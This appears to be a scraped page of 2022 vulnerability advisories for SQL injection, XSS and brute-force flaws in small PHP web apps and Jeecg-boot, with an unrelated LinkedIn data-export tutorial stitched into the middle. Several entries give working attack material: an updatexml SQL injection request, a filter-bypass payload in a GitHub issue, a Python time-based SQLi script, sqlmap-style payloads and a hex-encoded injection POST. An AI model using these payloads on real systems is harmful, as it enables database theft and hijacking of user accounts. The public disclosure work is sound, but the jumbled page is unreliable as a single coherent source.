Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /asms/products/view_product.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: thir3een13

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/products/view\_product.php?id=

Vulnerability location: /asms/products/view\_product.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/products/view\_product.php?id=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/products/view\_product.php?id\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44858: bug_report/SQLi-1.md at main · thir3een/bug_report

Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/duplicate/check.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

azraelxuemo opened this issue

Oct 25, 2022

· 10 comments

**Comments**

就是最新的，但是可以绕过

…

\---原始邮件--- 发件人: \*\*\*@\*\*\*.\*\*\*&gt; 发送时间: 2022年10月30日(周日) 下午3:33 收件人: \*\*\*@\*\*\*.\*\*\*&gt;; 抄送: \*\*\*@\*\*\*.\*\*\*\*\*\*@\*\*\*.\*\*\*&gt;; 主题: Re: \[jeecgboot/jeecg-boot\] /sys/duplicate/check存在sql注入漏洞 (Issue #4129) 你这个是哪个版本，针对注释这种我们处理过 — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

你们自己看我发的内容，里面你们加check了啊，但是check有问题，可以被bypass我已经说的很详细了，我是直接clone你们的项目

…

\---原始邮件--- 发件人: \*\*\*@\*\*\*.\*\*\*&gt; 发送时间: 2022年10月30日(周日) 下午3:41 收件人: \*\*\*@\*\*\*.\*\*\*&gt;; 抄送: \*\*\*@\*\*\*.\*\*\*\*\*\*@\*\*\*.\*\*\*&gt;; 主题: Re: \[jeecgboot/jeecg-boot\] /sys/duplicate/check存在sql注入漏洞 (Issue #4129) 截图版本号 — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

改成这样就好了  

okok好的好的，因为我看到的是checksql可以被绕过，所以就提出来了哈哈哈2333

…

\---原始邮件--- 发件人: \*\*\*@\*\*\*.\*\*\*&gt; 发送时间: 2022年10月30日(周日) 下午4:22 收件人: \*\*\*@\*\*\*.\*\*\*&gt;; 抄送: \*\*\*@\*\*\*.\*\*\*\*\*\*@\*\*\*.\*\*\*&gt;; 主题: Re: \[jeecgboot/jeecg-boot\] /sys/duplicate/check存在sql注入漏洞 (Issue #4129) 改成这样就好了 — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: \*\*\*@\*\*\*.\*\*\*&gt;

这个是我的版本号

我个人建议还是把sql注入里面的空格删掉  
因为你们替换了/**/  
但还可以用()绕过  
updatexml(1,(select(if(length("aaa")>5,1,sleep(10)))union select(1)),1)  
所以索性你们就不替换/**/这些  
然后直接把输入的整个字符串转成小写  
判断有没有select,这种关键字  
  
您看这样还是可以注入的  
就算我修改了还是可以绕过的  

2 participants

CVE-2022-45206: /sys/duplicate/check存在sql注入漏洞 · Issue #4129 · jeecgboot/jeecg-boot

Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/user/deleteRecycleBin.

CVE-2022-45210

Web Based Quiz System v1.0 transmits user passwords in plaintext during the authentication process, allowing attackers to obtain users' passwords via a bruteforce attack.

Software Link: https://www.sourcecodester.com/download-code?nid=14727&title=Web+Based+Quiz+System+in+PHP%2FMySQLi+with+Full+Source+Code

Version: v1.0

**

Steps to reproduce:

**

Try to login in the input box.

Capture the packet and find that the password is plaintext transmission, and try to conduct a violent attack.

Judge whether it is the correct password according to different return values.

**

Patch recommendation:

**

Add ratelimit protecion on POST login endpoints/parameters

CVE-2022-44411: Web Based Quiz System v1.0 is vulnerable to brute force attack

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.

    # Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)

Helmet Store Showroom 1.0 SQL Injection

Sanitization Management System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi## Author: nu11secur1ty## Date: 11.25.2022## Vendor: https://github.com/oretnom23,https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0## Description:The `id` parameter appears to be vulnerable to SQL injection attacks.The attacker can get all information from this system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQLParameter: id (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: p=services/view_service&id=126664801' or '5968'='5975' ORNOT 5461=5461 AND 'gEud'='gEud    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: p=services/view_service&id=126664801' or '5968'='5975' OR(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=services/view_service&id=126664801' or '5968'='5975'AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/rnfvjf)## Time spent`00:30:00`

Sanitization Management System 1.0 SQL Injection

By Owais Sultan
One of the best things about LinkedIn is that it allows you to download a CSV file with…
This is a post from HackRead.com Read the original post: How to use Linked Helper 2 as a LinkedIn Data Export Tool

One of the best things about LinkedIn is that it allows you to download a CSV file with your first-degree connections information. This file, however, lacks the email and phone numbers of the profile.

However, provided your first-degree connection has provided this information on your LinkedIn, it can easily be obtained by Linked Helper 2. It is important to note that getting the phone numbers and emails of your second and third degree is impossible because LinkedIn does not grant you access to such information.

You can use Linked Helper 2 to export your first-degree connections on LinkedIn to a downloadable CSV file. In addition, Linked Helper 2 also gives you a chance to create a targeted mailing list. In this article, we will guide you step by step on how you can use Linked Helper as a LinkedIn data export tool.

We are going to walk you through the following steps;

*   Creation of a new campaign
*   Profile collection
*   Adjusting action configurations
*   Starting the Campaign
*   Downloading the CSV file

Let us dive in!

**1 Generate a new campaign using a template with preset commands**

To create a new campaign, open the Campaign menu and click the Create new command. A pop window will appear, requiring you to name your Campaign. The next step is selecting the type of Campaign you want. At this stage, pick **people** as the campaign type. After that, select the needed template, i.e., **Visit and Extract profiles.** Wrap up by clicking the **Create** button.

Here, the Campaign generated only has a single action. However, if more steps are needed, you can configure the Workflow and add more actions.

**2 Profile collection into your created Campaign**

Near the Campaign queue, locate and click the **Collect** button. You will then be prompted to provide the source of your profiles. Since we want to collect first-degree connection profiles, we will use **the My network page** as the source.

After collecting the profiles, you can also review them to check for errors.

**3 Fine-tune action configurations**

You can adjust action settings under the General tab. Here you can configure the action’s name and suspend the start of the action. After a profile has been processed through an activity, Linked Helper 2 can automatically remove or assign tags associated with the profile.

On the **Tags tab** under the action, enter a tag name and confirm it by pressing enter on your personal computer. Now proceed to the Display settings Tab, select Bunch, and fine-tune its size and the time between bunches.

**4 Start the Campaign**

Start the Campaign can quickly be done by clicking the **Start campaign** button on the left menu. You can also launch the Campaign by clicking the **Start** button at the topmost section of your screen.

As soon as the campaign launches, the Campaign’s status will change, and Linked Helper will display when the subsequent step is carried out. Linked Helper uses a green frame to highlight the Campaign being performed.

**5 Download CSV profiles**

Visited profiles are stored under the **Successful** sub-list by Linked Helper. To access them click the **Successful** command or **Campaign**, then **Workflow.** 

To download these profiles, first, click **the Select all** button to select all the profiles. Finish up by clicking **Download.** Remember to choose your delimiter, preferably Google Sheets or MS Excel.

1.  How to Use Excel to Scrape a Website
2.  Penetration Testing Azure: The User-Friendly Guide
3.  How to configure cPanel and WHM Panel on your VPS
4.  6 Best Ways to Make a Collaborative PowerPoint Presentation
5.  MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

How to use Linked Helper 2 as a LinkedIn Data Export Tool

Ecommerce version 1.0 suffers from cross site scripting and open redirection vulnerabilities.

    ## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection## Author: nu11secur1ty## Date: 11.23.2022## Vendor: https://github.com/winston-dsouza## Software: https://github.com/winston-dsouza/ecommerce-website## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website## Description:The value of the eMail request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The attacker can trick the users of this system, very easy to visit avery dangerous link from anywhere, and then the game will over forthese customers.Also, the attacker can create a network from botnet computers by usingthis vulnerability.## STATUS: HIGH Vulnerability[+] Exploit00:```POSTPOST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.comHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Description01:JavaScript can be injected into the application response (a vulnerableapp - signup_script.php, no sanitizing submit function).The attacker can crash the MySQL server by sending large bites of POSTrequests to the MySQL server of this system.## STATUS: HIGH Vulnerability - CRITICAL## Real attack:[+] Exploit01:```POSTPOST /ecommerce/signup_script.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 1070eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)## Proof and Exploit:[href](https://streamable.com/3r4t36)## Real Exploit:[href](https://streamable.com/n3b5ev)## Real Exploit - code insert:[href](https://streamable.com/64dmo2)## Time spent`1:45`

Ecommerce 1.0 Cross Site Scripting / Open Redirect

A vulnerability was found in rickxy Stock Management System and classified as critical. Affected by this issue is some unknown functionality of the file /pages/processlogin.php. The manipulation of the argument user/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214322 is the identifier assigned to this vulnerability.

CVE-2022-4088

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to make XWiki create many new schemas and fill them with tables just by using a crafted user identifier in the login form. This may lead to degraded database performance. The problem has been patched in XWiki 13.10.8, 14.6RC1 and 14.4.2. Users are advised to upgrade. There are no known workarounds for this issue.

Tag

#sql